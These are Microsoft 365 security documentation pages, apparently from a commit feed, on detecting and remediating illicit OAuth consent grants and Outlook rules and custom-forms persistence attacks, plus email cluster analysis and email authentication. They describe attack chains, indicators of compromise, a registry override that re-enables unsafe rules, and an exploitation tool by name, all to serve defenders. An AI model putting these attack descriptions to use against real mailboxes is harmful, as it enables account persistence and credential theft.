-In an illicit consent grant attack, the attacker creates an Azure-registered application that requests access to data such as contact information, email, or documents. The attacker then tricks an end user into granting that application consent to access their data either through a phishing attack, or by injecting illicit code into a trusted website. After the illicit application is granted consent, it has account-level access to data without the need for an organizational account. Normal remediation steps (for example, resetting passwords or requiring multi-factor authentication (MFA)) aren't effective against this type of attack, because these apps are external to the organization.
-
-These attacks use an interaction model that presumes the entity calling the information is automation and not a human.
-
-> [!IMPORTANT]
-> Do you suspect you're experiencing problems with illicit consent-grants from an app, right now? Microsoft Defender for Cloud Apps has tools to detect, investigate, and remediate your OAuth apps. This Defender for Cloud Apps article has a tutorial that outlines how to go about [investigating risky OAuth apps](/cloud-app-security/investigate-risky-oauth). You can also set [OAuth app policies](/cloud-app-security/app-permission-policy) to investigate app-requested permissions, which users are authorizing these apps, and widely approve or ban these permissions requests.
-
-## What does an illicit consent grant attack look like in Microsoft 365?
-
-You need to search the **audit log** to find signs, also called Indicators of Compromise (IOC) of this attack. For organizations with many Azure-registered applications and a large user base, the best practice is to review your organizations consent grants on a weekly basis.
-
-### Steps for finding signs of this attack
-
-1. Open the Microsoft Defender portal at <https://security.microsoft.com> and then select **Audit**. Or, to go directly to the **Audit** page, use <https://security.microsoft.com/auditlogsearch>.
-
-2. On the **Audit** page, verify that the **Search** tab is selected, and then configure the following settings:
- - **Date and time range**
- - **Activities**: Verify that **Show results for all activities** is selected.
-
- When you're finished, select **Search**.
-
-3. Select the **Activity** column to sort the results and look for **Consent to application**.
-
-4. Select an entry from the list to see the details of the activity. Check to see if IsAdminConsent is set to True.
-
-> [!NOTE]
->
-> It can take from 30 minutes up to 24 hours for the corresponding audit log entry to be displayed in the search results after an event occurs.
->
-> The length of time that an audit record is retained and searchable in the audit log depends on your Microsoft 365 subscription, and specifically the type of the license that is assigned to a specific user. For more information, see [Audit log](/purview/audit-log-search).
->
-> The value is true indicates that someone with Global Administrator access might have granted broad access to data. If this value is unexpected, take steps to [confirm an attack](#how-to-confirm-an-attack).
-
-## How to confirm an attack
-
-If you have one or more instances of the IOCs previously listed, you need to do further investigation to positively confirm that the attack occurred. You can use any of these three methods to confirm the attack:
--- Inventory applications and their permissions using the Microsoft Entra admin center. This method is thorough, but you can only check one user at a time that can be very time consuming if you have many users to check.-- Inventory applications and their permissions using PowerShell. This is the fastest and most thorough method, with the least amount of overhead.-- Have your users individually check their apps and permissions and report the results back to the administrators for remediation.-
-## Inventory apps with access in your organization
-
-You have the following options to inventory apps for your users:
--- The Microsoft Entra admin center.-- PowerShell.-- Have your users individually enumerate their own application access.-
-### Steps for using the Microsoft Entra admin center
-
-You can look up the applications to which any individual user has granted permissions by using the Microsoft Entra admin center:
-
- 1. Open the Microsoft Entra admin center at <https://entra.microsoft.com>, and then go to **Identity** \> **Users** \> ***All users**. Or, to go directly to **Users** \> **All users**, use <https://entra.microsoft.com/#view/Microsoft_AAD_UsersAndTenants/UserManagementMenuBlade/~/AllUsers/menuId/>.
- 2. Find and select the user that you want to review by clicking on the **Display name** value.
- 3. On the user details page that opens, select **Applications**.
-
-These steps show you the apps that are assigned to the user and what permissions the applications have.
-
-### Steps for having your users enumerate their application access
-
-Have your users go to <https://myapps.microsoft.com> and review their own application access there. They should be able to see all the apps with access, view details about them (including the scope of access), and be able to revoke privileges to suspicious or illicit apps.
-
-### Steps in PowerShell
-
-The simplest way to verify the Illicit Consent Grant attack is to run [Get-AzureADPSPermissions.ps1](https://gist.github.com/psignoret/41793f8c6211d2df5051d77ca3728c09), which dumps all the OAuth consent grants and OAuth apps for all users in your tenancy into one .csv file.
-
-#### Prerequisites
--- The Azure AD PowerShell library installed.-- Global Administrator permissions in the organization where the script is run.-- Local Administrator permissions on the computer where you run the scripts.-
-> [!IMPORTANT]
-> We ***highly recommend*** that you require multi-factor authentication on your admin account. This script supports MFA authentication.
--
-1. Sign in to the computer where you want to run the scripts with local administrator rights.
-
-2. Download or copy the [Get-AzureADPSPermissions.ps1](https://gist.github.com/psignoret/41793f8c6211d2df5051d77ca3728c09) script from GitHub to a folder that's easy to find and remember. This folder is also where you need to write the "permissions.csv" output file is written.
-
-3. Open an elevated PowerShell session as an administrator in the folder where you saved the script.
-
-4. Connect to your directory using the [Connect-MgGraph](/powershell/microsoftgraph/authentication-commands#using-connect-mggraph) cmdlet.
-
-5. Run this PowerShell command:
-
- ```powershell
- .\Get-AzureADPSPermissions.ps1 | Export-csv -Path "Permissions.csv" -NoTypeInformation
- ```
-
-The script produces one file named Permissions.csv. Follow these steps to look for illicit application permission grants:
-
-1. In the ConsentType column (column G) search for the value "AllPrinciples." The AllPrincipals permission allows the client application to access everyone's content in the tenancy. Native Microsoft 365 applications need this permission to work correctly. Every non-Microsoft application with this permission should be reviewed carefully.
-
-2. In the Permission column (column F), review the permissions that each delegated application has to content. Look for "Read" and "Write" permission or "All" permission, and review these permissions carefully, because they might not be appropriate.
-
-3. Review the specific users that have consents granted. If high profile or high value users have inappropriate consents granted, you should investigate further.
-
-4. In the ClientDisplayName column (column C) look for apps that seem suspicious. Apps with misspelled names, super bland names, or hacker-sounding names should be reviewed carefully.
-
-## Determine the scope of the attack
-
-After you finished inventorying application access, review the **audit log** to determine the full scope of the breach. Search on the affected users, the time frames that the illicit application had access to your organization, and the permissions the app had. You can search the **audit log** in the [Microsoft Defender portal](audit-log-search-defender-portal.md).
-
-> [!IMPORTANT]
-> [Mailbox auditing](/purview/audit-mailboxes) and [Activity auditing for admins and users](/purview/audit-log-enable-disable) must have been enabled prior to the attack for you to get this information.
-
-## How to stop and remediate an illicit consent grant attack
-
-After you identified the application with illicit permissions, you have several ways to remove that access:
--- You can revoke the application's permission in the Microsoft Entra admin center by doing the following steps:
- 1. Open the Microsoft Entra admin center at <https://entra.microsoft.com>, and then go to **Identity** \> **Users** \> ***All users**. Or, to go directly to **Users** \> **All users**, use <https://entra.microsoft.com/#view/Microsoft_AAD_UsersAndTenants/UserManagementMenuBlade/~/AllUsers/menuId/>.
- 2. Find and select the affected user by clicking on the **Display name** value.
- 3. On the user details page that opens, select **Applications**.
- 4. On the **Applications** page, select the illicit application by clicking on the **Name** value.
- 5. On the **Assignment detail** page that opens, select **Remove**.
--- You can revoke the OAuth consent grant with PowerShell by following the steps in [Remove-MgOauth2PermissionGrant](/powershell/module/microsoft.graph.identity.signins/remove-mgoauth2permissiongrant)--- You can revoke the Service App Role Assignment with PowerShell by following the steps in [Remove-MgServicePrincipalAppRoleAssignment](/powershell/module/microsoft.graph.applications/remove-mgserviceprincipalapproleassignment).--- You can disable sign-in for the affected account, which disables access to data in the account by the app. This action isn't ideal for user productivity, but it can be a short-term remediation to quickly limit the results of the attack.--- You can turn off integrated applications in your organization. This action is drastic. Although it prevents users from accidentally granting access to a malicious app, it also prevents all users from granting consent to any applications. We don't recommend this action because it severely impairs user productivity with third-party applications. You can turn off integrated apps by following the steps in [Turning Integrated Apps on or off](/microsoft-365/admin/misc/user-consent).-
-## See also
--- [Applications listed in Enterprise applications](/entra/identity/enterprise-apps/application-list) walks administrators through various actions they might want to take after realizing there are unexpected applications with access to data.-- [Quickstart: Register an application with the Microsoft identity platform](/entra/identity-platform/quickstart-register-app) is a high-level overview of consent and permissions.-- [Configure token lifetime policies](/entra/identity-platform/configure-token-lifetimes) provides links to various consent related articles.-- [Application and service principal objects in Microsoft Entra ID](/entra/identity-platform/app-objects-and-service-principals) provides an overview of the Application and Service principal objects that are core to the application model.-- [Manage access to an application](/entra/identity/enterprise-apps/what-is-access-management) is an overview of the capabilities that administrators have to manage user access to apps.
security Detect And Remediate Outlook Rules Forms Attack https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/detect-and-remediate-outlook-rules-forms-attack.md
- Title: Detect and remediate the Outlook rules and custom forms injections attacks.
- - NOCSH
--- Previously updated : 9/7/2023--
- - tier2
- - m365-security
- - MET150
-description: Learn how to recognize and remediate the Outlook rules and custom forms injections attacks in Office 365
--
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Detect and Remediate Outlook Rules and Custom Forms Injections Attacks
--
-**Summary** Learn how to recognize and remediate the Outlook rules and custom Forms injections attacks in Office 365.
-
-## What is the Outlook Rules and Custom Forms injection attack?
-
-After an attacker gains access to your organization, they try to establish a foothold to stay in or get back in after they're discovered. This activity is called *establishing a persistence mechanism*. There are two ways that an attacker can use Outlook to establish a persistence mechanism:
--- By exploiting Outlook rules.-- By injecting custom forms into Outlook.-
-Reinstalling Outlook, or even giving the affected person a new computer doesn't help. When the fresh installation of Outlook connects to the mailbox, all rules and forms are synchronized from the cloud. The rules or forms are typically designed to run remote code and install malware on the local machine. The malware steals credentials or performs other illicit activity.
-
-The good news is: if you keep Outlook clients patched to the latest version, you aren't vulnerable to the threat as current Outlook client defaults block both mechanisms.
-
-The attacks typically follow these patterns:
-
-**The Rules Exploit**:
-
-1. The attacker steals a user's credentials.
-2. The attacker signs in to that user's Exchange mailbox (Exchange Online or on-premises Exchange).
-3. The attacker creates a forwarding Inbox rule in the mailbox. The forwarding rule is triggered when the mailbox receives a specific message from the attacker that matches the conditions of the rule. The rule conditions and message format are tailor-made for each other.
-4. The attacker sends the trigger email to the compromised mailbox, which is still being used as normal by the unsuspecting user.
-5. When the mailbox receives a message that matches the conditions of rule, the action of the rule is applied. Typically, the rule action is to launch an application on a remote (WebDAV) server.
-6. Typically, the application installs malware on the user's machine (for example, [PowerShell Empire](https://github.com/EmpireProject/Empire/)).
-7. The malware allows the attacker to steal (or steal again) the user's username and password or other credentials from local machine and perform other malicious activities.
-
-**The Forms Exploit**:
-
-1. The attacker steals a user's credentials.
-2. The attacker signs in to that user's Exchange mailbox (Exchange Online or on-premises Exchange).
-3. The attacker inserts a custom mail form template into the user's mailbox. The custom form is triggered when the mailbox receives a specific message from the attacker that requires the mailbox to load the custom form. The custom form and the message format are tailor-made for each other.
-4. The attacker sends the trigger email to the compromised mailbox, which is still being used as normal by the unsuspecting user.
-5. When the mailbox receives the message, the mailbox loads the required form. The form launches an application on a remote (WebDAV) server.
-6. Typically, the application installs malware on the user's machine (for example, [PowerShell Empire](https://github.com/EmpireProject/Empire)).
-7. The malware allows the attacker to steal (or steal again) the user's username and password or other credentials from local machine and perform other malicious activities.
-
-## What a Rules and Custom Forms Injection attack might look like Office 365?
-
-Users are unlikely to notice these persistence mechanisms and they might even be invisible to them. The following list describes the signs (Indicators of Compromise) that indicate remediation steps are required:
--- **Indicators of the Rules compromise**:
- - Rule Action is to start an application.
- - Rule References an EXE, ZIP, or URL.
- - On the local machine, look for new process starts that originate from the Outlook PID.
--- **Indicators of the Custom forms compromise**:
- - Custom forms present saved as their own message class.
- - Message class contains executable code.
- - Typically, malicious forms are stored in Personal Forms Library or Inbox folders.
- - Form is named IPM.Note.[custom name].
-
-## Steps for finding signs of this attack and confirming it
-
-You can use either of the following methods to confirm the attack:
--- Manually examine the rules and forms for each mailbox using the Outlook client. This method is thorough, but you can only check one mailbox at a time. This method can be very time consuming if you have many users to check, and might also infect the computer that you're using.--- Use the [Get-AllTenantRulesAndForms.ps1](https://github.com/OfficeDev/O365-InvestigationTooling/blob/master/Get-AllTenantRulesAndForms.ps1) PowerShell script to automatically dump all the mail forwarding rules and custom forms for all the users in your organization. This method is the fastest and safest with the least amount of overhead.-
- > [!NOTE]
- > As of January 2021, the script (and everything else in the repository) is read-only and archived. Lines 154 to 158 attempt to connect to Exchange Online PowerShell using a method that's no longer supported due to the [deprecation of remote PowerShell connections](https://techcommunity.microsoft.com/t5/exchange-team-blog/deprecation-of-remote-powershell-in-exchange-online-re-enabling/ba-p/3779692) in July 2023. Remove lines 154 to 158 and [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) before you run the script.
-
-### Confirm the Rules Attack Using the Outlook client
-
-1. Open the users Outlook client as the user. The user may need your help in examining the rules on their mailbox.
-
-2. Refer to [Manage email messages by using rules](https://support.microsoft.com/office/c24f5dea-9465-4df4-ad17-a50704d66c59) article for the procedures on how to open the rules interface in Outlook.
-
-3. Look for rules that the user didn't create, or any unexpected rules or rules with suspicious names.
-
-4. Look in the rule description for rule actions that start and application or refer to an .EXE, .ZIP file or to launching a URL.
-
-5. Look for any new processes that start using the Outlook process ID. Refer to [Find the Process ID](/windows-hardware/drivers/debugger/finding-the-process-id).
-
-### Steps to confirm the Forms attack using the Outlook client
-
-1. Open the user Outlook client as the user.
-
-2. Follow the steps in, [Show the Developer tab](https://support.microsoft.com/office/e1192344-5e56-4d45-931b-e5fd9bea2d45) for the user's version of Outlook.
-
-3. Open the now visible developer tab in Outlook and select **design a form**.
-
-4. Select the **Inbox** from the **Look In** list. Look for any custom forms. Custom forms are rare enough that if you have any custom forms at all, it is worth a deeper look.
-
-5. Investigate any custom forms, especially forms marked as hidden.
-
-6. Open any custom forms and in the **Form** group, select **View Code** to see what runs when the form is loaded.
-
-### Steps to confirm the Rules and Forms attack using PowerShell
-
-The simplest way to verify a rules or custom forms attack is to run the [Get-AllTenantRulesAndForms.ps1](https://github.com/OfficeDev/O365-InvestigationTooling/blob/master/Get-AllTenantRulesAndForms.ps1) PowerShell script. This script connects to every mailbox in your organization and dumps all the rules and forms into two .csv files.
-
-#### Prerequisites
-
-You need to be a member of the Global Administrator role in [Microsoft Entra ID](/entra/identity/role-based-access-control/manage-roles-portal) or the Organization Management role group in [Exchange Online](/exchange/permissions-exo/permissions-exo), because the script connects to every mailbox in the organization to read rules and forms.
-
-1. Use an account with local administrator rights to sign in to the computer where you intend to run the script.
-
-2. Download or copy the contents of the **Get-AllTenantRulesAndForms.ps1** script from GitHub to a folder that's easy to find and run the script from. The script creates two date stamped files in the folder: `MailboxFormsExport-yyyy-mm-dd.csv` and `MailboxRulesExport-yyyy-mm-dd.csv`.
-
- Remove lines 154 to 158 from the script, because that connection method no longer works as of July 2023.
-
-3. [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).
-
-4. Navigate in PowerShell to the folder where you saved the script, and then run the following command:
-
- ```powershell
- .\Get-AllTenantRulesAndForms.ps1
- ```
-
-#### Interpreting the output
--- **MailboxRulesExport-*yyyy-mm-dd*.csv**: Examine the rules (one per row) for action conditions that include applications or executables:
- - **ActionType (column A)**: The rule is likely malicious if this column contains the value `ID_ACTION_CUSTOM`.
- - **IsPotentiallyMalicious (column D)**: The rule is likely malicious if this column contains the value `TRUE`.
- - **ActionCommand (column G)**: The rule is likely malicious if this column contains any of the following values:
- - An application.
- - An .exe or .zip file.
- - An unknown entry that refers to a URL.
-- **MailboxFormsExport-*yyyy-mm-dd*.csv**: In general, the use of custom forms is rare. If you find any in this workbook, open that user's mailbox and examine the form itself. If your organization didn't put it there intentionally, it's likely malicious.-
-## How to stop and remediate the Outlook Rules and Forms attack
-
-If you find any evidence of either of these attacks, remediation is simple: just delete the rule or form in the mailbox. You can delete the rule or form using the Outlook client or using Exchange PowerShell.
-
-### Using Outlook
-
-1. Identify all devices where the user has used Outlook. They all need to be cleaned of potential malware. Don't allow the user to sign on and use email until all devices have been cleaned.
-
-2. On each device, follow the steps in [Delete a rule](https://support.microsoft.com/office/2f0e7139-f696-4422-8498-44846db9067f).
-
-3. If you're unsure about the presence of other malware, you can format and reinstall all the software on the device. For mobile devices, you can follow the manufacturers steps to reset the device to the factory image.
-
-4. Install the most up-to-date versions of Outlook. Remember, current version of Outlook blocks both types of this attack by default.
-
-5. Once all offline copies of the mailbox have been removed, do the following steps:
- - Reset the user's password using a high quality value (length and complexity).
- - If multi-factor authentication (MFA) isn't turned on for the user, follow the steps in [Setup multi-factor authentication for users](/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication)
-
- These steps ensure that the user's credentials aren't exposed via other means (for example, phishing or password reuse).
-
-### Using PowerShell
-
-Connect to the required Exchange PowerShell environment:
--- **Mailboxes on on-premises Exchange servers**: [Connect to Exchange servers using remote PowerShell](/powershell/exchange/connect-to-exchange-servers-using-remote-powershell) or [Open the Exchange Management Shell](/powershell/exchange/open-the-exchange-management-shell).--- **Mailboxes in Exchange Online**: [Connect to Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell).-
-After you connect to the required Exchange PowerShell environment, you can take the following actions on Inbox rules in user mailboxes:
--- **View Inbox rules in a mailbox**:-
- - **View a summary list of all rules**
-
- ```powershell
- Get-InboxRule -Mailbox laura@contoso.onmicrosoft.com
- ```
-
- - **View detailed information for a specific rule**:
-
- ```powershell
- Get-InboxRule -Mailbox laura@contoso.onmicrosoft.com -Identity "Suspicious Rule Name" | Format-List
- ```
-
- For detailed syntax and parameter information, see [Get-InboxRule](/powershell/module/exchange/get-inboxrule).
--- **Remove Inbox rules from a mailbox**:-
- - **Remove a specific rule**:
-
- ```powershell
- Remove-InboxRule -Mailbox laura@contoso.onmicrosoft.com -Identity "Suspicious Rule Name"
- ```
-
- - **Remove all rules**:
-
- ```powershell
- Get-InboxRule -Mailbox laura@contoso.onmicrosoft.com | Remove-InboxRule
- ```
-
- For detailed syntax and parameter information, see [Remove-InboxRule](/powershell/module/exchange/remove-inboxrule).
--- **Turn off an Inbox rule for further investigation**:-
- ```powershell
- Disable-InboxRule -Mailbox laura@contoso.onmicrosoft.com -Identity "Suspicious Rule Name"
- ```
-
- For detailed syntax and parameter information, see [Disable-InboxRule](/powershell/module/exchange/disable-inboxrule).
-
-## How to minimize future attacks
-
-### First: protect accounts
-
-The Rules and Forms exploits are only used by an attacker after they've stolen or breached a user's account. So, your first step to preventing the use of these exploits against your organization is to aggressively protect user accounts. Some of the most common ways that accounts are breached are through phishing or [password spray attacks](https://www.microsoft.com/security/blog/2020/04/23/protecting-organization-password-spray-attacks/).
-
-The best way to protect user accounts (especially admin accounts) is to [set up MFA for users](/microsoft-365/admin/security-and-compliance/set-up-multi-factor-authentication). You should also:
--- Monitor how user accounts are [accessed and used](/entra/identity/monitoring-health/overview-monitoring-health). You may not prevent the initial breach, but you can shorten the duration and the effects of the breach by detecting it sooner. You can use these [Office 365 Cloud App Security policies](/cloud-app-security/what-is-cloud-app-security) to monitor accounts and alert you to unusual activity:-
- - **Multiple failed login attempts**: Triggers an alert when users perform multiple failed sign in activities in a single session with respect to the learned baseline, which could indicate an attempted breach.
-
- - **Impossible travel**: Triggers an alert when activities are detected from the same user in different locations within a time period that's shorter than the expected travel time between the two locations. This activity could indicate that a different user is using the same credentials. Detecting this anomalous behavior necessitates an initial learning period of seven days to learn a new user's activity pattern.
-
- - **Unusual impersonated activity (by user)**: Triggers an alert when users perform multiple impersonated activities in a single session with respect to the baseline learned, which could indicate an attempted breach.
--- Use a tool like [Office 365 Secure Score](/microsoft-365/security/defender/microsoft-secure-score) to manage account security configurations and behaviors.-
-### Second: Keep Outlook clients current
-
-Fully updated and patched versions of Outlook 2013, and 2016 disable the "Start Application" rule/form action by default. Even if an attacker breaches the account, the rule and form actions are blocked. You can install the latest updates and security patches by following the steps in [Install Office updates](https://support.microsoft.com/office/2ab296f3-7f03-43a2-8e50-46de917611c5).
-
-Here are the patch versions for Outlook 2013 and 2016 clients:
--- **Outlook 2016**: 16.0.4534.1001 or greater.-- **Outlook 2013**: 15.0.4937.1000 or greater.-
-For more information on the individual security patches, see:
--- [Outlook 2016 Security Patch](https://support.microsoft.com/help/3191883)-- [Outlook 2013 Security Patch](https://support.microsoft.com/help/3191938)-
-### Third: Monitor Outlook clients
-
-Even with the patches and updates installed, it's possible for an attacker to change the local machine configuration to reenable the "Start Application" behavior. You can use [Advanced Group Policy Management](/microsoft-desktop-optimization-pack/agpm/) to monitor and enforce local machine policies on client devices.
-
-You can see if "Start Application" has been re-enabled through an override in the registry by using the information in [How to view the system registry by using 64-bit versions of Windows](https://support.microsoft.com/help/305097). Check these subkeys:
--- **Outlook 2016**: `HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\`-- **Outlook 2013**: `HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Security\`-
-Look for the key `EnableUnsafeClientMailRules`:
--- If the value is 1, the Outlook security patch has been overridden and the computer is vulnerable to the Form/Rules attack.-- If the value is 0, the "Start Application" action is disabled.-- If the registry key isn't present and the updated and patched version of Outlook is installed, then the system isn't vulnerable to these attacks.-
-Customers with on-premises Exchange installations should consider blocking older versions of Outlook that don't have patches available. Details on this process can be found in the article [Configure Outlook client blocking](/exchange/configure-outlook-client-blocking-exchange-2013-help).
-
-## See also:
--- [Malicious Outlook Rules](https://silentbreaksecurity.com/malicious-outlook-rules/) by SilentBreak Security Post about Rules Vector provides a detailed review of how the Outlook Rules.-- [MAPI over HTTP and Mailrule Pwnage](https://sensepost.com/blog/2016/mapi-over-http-and-mailrule-pwnage/) on the Sensepost blog about Mailrule Pwnage discusses a tool called Ruler that lets you exploit mailboxes through Outlook rules.-- [Outlook forms and shells](https://sensepost.com/blog/2017/outlook-forms-and-shells/) on the Sensepost blog about Forms Threat Vector.-- [Ruler Codebase](https://github.com/sensepost/ruler)-- [Ruler Indicators of Compromise](https://github.com/sensepost/notruler/blob/master/iocs.md)
security Email Analysis Investigations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-analysis-investigations.md
- Title: Email analysis in investigations for Microsoft Defender for Office 365-- NOCSH------ MET150-- MOE150--- m365-security-- m365initiative-defender-office365-- tier3
-keywords: automated incident response, investigation, remediation, threat protection
-description: See how email analysis in investigations work in Microsoft Defender for Office 365.
--- air-- seo-marvel-mar2020- Previously updated : 6/15/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Email analysis in investigations for Microsoft Defender for Office 365
--
-During the automated investigation of alerts, Microsoft Defender for Office 365 analyzes the original email for threats and identifies other email messages that are related to the original email and potentially part of an attack. This analysis is important because email attacks rarely consist of a single email.
-
-The automated investigation's email analysis identifies email clusters using attributes from the original email to query for email sent and received by your organization. This analysis is similar to how a security operations analyst would hunt for the related email in Explorer or Advanced Hunting. Several queries are used to identify matching email messages because attackers typically morph the email parameters to avoid security detection. The clustering analysis performs these checks to determine how to handle email involved in the investigation:
--- The email analysis creates queries (clusters) of email using attributes from the original email: sender values (IP address, sender domain) and contents (subject, cluster ID) in order to find email that might be related.-- If analysis of the original email's URLs and files identifies that some are malicious (that is, malware or phishing), then it also creates queries or clusters of email containing the malicious URL or file.-- Email clustering analysis counts the threats associated with the similar email in the cluster to determine whether the email is malicious, suspicious, or has no clear threats. If the cluster of email matching the query has a sufficient amount of spam, normal phishing, high confidence phishing or malware threats, the email cluster gets that threat type applied to it.-- The email clustering analysis also checks the latest delivery location of the original email and messages in the email clusters to help identify messages that potentially need removal or have already been remediated or prevented. This analysis is important because attackers morph malicious content plus security policies and protection might vary between mailboxes. This capability leads to situations where malicious content might still sit in mailboxes, even though one or more malicious email messages have been prevented or detected and removed by zero-hour auto purge (ZAP).-- Email clusters that are considered malicious due to malware, high confidence phishing, malicious files, or malicious URL threats get a pending action to soft delete messages that are still in the cloud mailbox (Inbox or Junk Email folders). If malicious email or email clusters are "Not In Mailbox" (blocked, quarantined, failed, soft deleted, etc.) or "On-premises/External" with none in the cloud mailbox, then no pending action is set up to remove them.-- If any of the email clusters are determined to be malicious, then the threat identified by the cluster is applied back to the original email involved in the investigation. This behavior is similar to a security operations analyst using email hunting results to determine the verdict of an original email based on similar email. This result ensures that regardless of whether an original email's URLs, files, or source email indicators are detected or not, the system can identify malicious email messages that are potentially evading detection through personalization, morphing, evasion, or other attacker techniques.-- In the user compromise investigation, additional email clusters are created to identify potential email issues created by the mailbox. This process includes a clean email cluster (good email from user, potential data exfiltration, and potential command/control email), suspicious email clusters (email containing spam or normal phishing), and malicious email clusters (email containing malware or high confidence phishing). These email clusters provide security operations analysts data to determine other problems that might need to be addressed from a compromise, and visibility on which messages might have triggered the original alerts (for example, phishing/spam that triggered user sending restrictions)-
-Email clustering analysis via similarity and malicious entity queries ensures that email problems are fully identified and cleaned up, even if only one email from an attack gets identified. You can use links from the email cluster details side panel views to open the queries in Explorer or Advanced Hunting to perform deeper analysis and change the queries if needed. This capability enables manual refinement and remediation if you find the email cluster's queries too narrow or too broad (including unrelated email).
-
-Here are additional enhancements to email analysis in investigations.
-
-## AIR investigation ignores advanced delivery items (SecOps mailboxes and phishing simulation messages)
-
-During the email clustering analysis, all clustering queries ignore SecOps mailboxes and phishing simulation URLs that are identified Advanced delivery policy. SecOps mailboxes and phishing simulation URLs aren't shown in the query to keep the clustering attributes simple and easy to read. These exclusions ensure that messages sent to SecOps mailboxes and messages that contain phishing simulation URLs are ignored during threat analysis and don't get removed during any remediation.
-
-> [!NOTE]
-> When opening an email cluster to view it in Explorer from the email cluster details, the phishing simulation and SecOps mailbox filters are be applied in Explorer, but aren't shown. If you change the Explorer filters, dates, or refresh the query within the page, then the phishing simulation/SecOps filter exclusions are removed, and matching email messages are shown once again. If you refresh the Explorer page using the browser refresh function, the original query filters are re-loaded, including the phishing simulation/SecOps filters, but removing any subsequent changes you had made.
-
-## AIR updates pending email action status
-
-The investigation email analysis calculates email threats and locations at the time of the investigation to create the investigation evidence and actions. This data can get stale and outdated when actions outside of the investigation affect the email involved in the investigation. For example, security operations manual hunting and remediation might clean up email included in an investigation. Likewise, deletion actions approved in parallel investigations or ZAP automatic quarantine actions might have removed email. In addition, delayed detections of threats after email delivery might change the number of threats included in the investigation's email queries/clusters.
-
-To ensure investigation actions are up to date, investigations that contain pending actions periodically re-run the email analysis queries to update the email locations and threats.
--- When the email cluster data changes, it updates the threat and latest delivery location counts.-- If email or email cluster with pending actions no longer are in the mailbox, then the pending action is canceled, and the malicious email/cluster considered remediated.-- Once all the investigation's threats have been remediated or canceled as previously described, then the investigation transitions to a remediated state and the original alert resolved.-
-## The display of incident evidence for email and email clusters
-
-Email-based evidence in the **Evidence and Response** tab for an incident now displays the following information.
--
-From the numbered callouts in the figure:
-
-1. You can perform remediation actions, in addition to the **Action Center**.
-2. You can take remediation action for email clusters with a **Malicious** verdict (but not **Suspicious**).
-3. For the email spam verdict, phishing is split into high confidence and normal phishing.
-
- For a Malicious verdict, the threat categories are malware, high confidence phishing, malicious URL, and malicious file.
-
- For a Suspicious verdict, the threat categories are spam and normal phishing.
-
-4. The email count by is based the latest delivery location and includes counters for email in mailboxes, not in mailboxes, and on-premises.
-5. Includes the date and time of the query, which might get updated for latest data.
-
-For email or email clusters in the **Entities** tab of an investigation, **Prevented** means that there was no malicious email in the mailbox for this item (mail or cluster). Here's an example.
--
-In this example, the email is malicious but not in a mailbox.
-
-## Next steps
--- [View pending or completed remediation actions](air-review-approve-pending-completed-actions.md)
security Email Authentication About https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-authentication-about.md
- Title: Email authentication in Microsoft 365
- - NOCSH
----
- - MET150
-
- - m365-security
- - tier2
-
-description: Admins can learn how email authentication (SPF, DKIM, DMARC) works and how Microsoft 365 uses traditional email authentication and composite email authentication to identify messages as spoofing, or pass messages that would otherwise be identified as spoofing.
- Previously updated : 3/7/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Email authentication in Microsoft 365
--
-As a Microsoft 365 organization with mailboxes in Exchange Online, or a standalone Exchange Online Protection (EOP) organization without Exchange Online mailboxes, protecting the integrity of email messages from senders in your domains is important. Recipients should feel confident that messages from senders in your domain really came from senders in your domain.
-
-Email authentication (also known as _email validation_) is a group of standards to identify and prevent the delivery of email messages from forged senders (also known as _spoofing_). Spoofed senders are commonly used in business email compromise (BEC), phishing, and other email attacks. These standards include:
--- **Sender Policy Framework (SPF)**: Specifies the source email servers that are authorized to send mail for the domain.-- **DomainKeys Identified Mail (DKIM)**: Uses a domain to digitally sign important elements of the message to ensure the message hasn't been altered in transit.-- **Domain-based Message Authentication, Reporting and Conformance (DMARC)**: Specifies the action for messages that fail SPF or DKIM checks for senders in the domain, and specifies where to send the DMARC results (reporting).-- **Authenticated Received Chain (ARC)**: Preserves original email authentication information by known services that modify messages in transit. The destination email server can use this information to authenticate messages that would otherwise fail DMARC.-
-It's important to realize that these standards are _interdependent building blocks_ that _work together_ to provide the best possible email protection against spoofing and phishing attacks. _Anything less than all of the email authentication methods results in substandard protection_.
-
-To configure email authentication for mail **sent from** Microsoft 365 organizations with mailboxes in Exchange Online or standalone Exchange Online Protection (EOP) organizations without Exchange Online mailboxes, see the following articles:
--- [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md)-- [Use DKIM to validate outbound email sent from your custom domain](email-authentication-dkim-configure.md)-- [Use DMARC to validate email](email-authentication-dmarc-configure.md)-
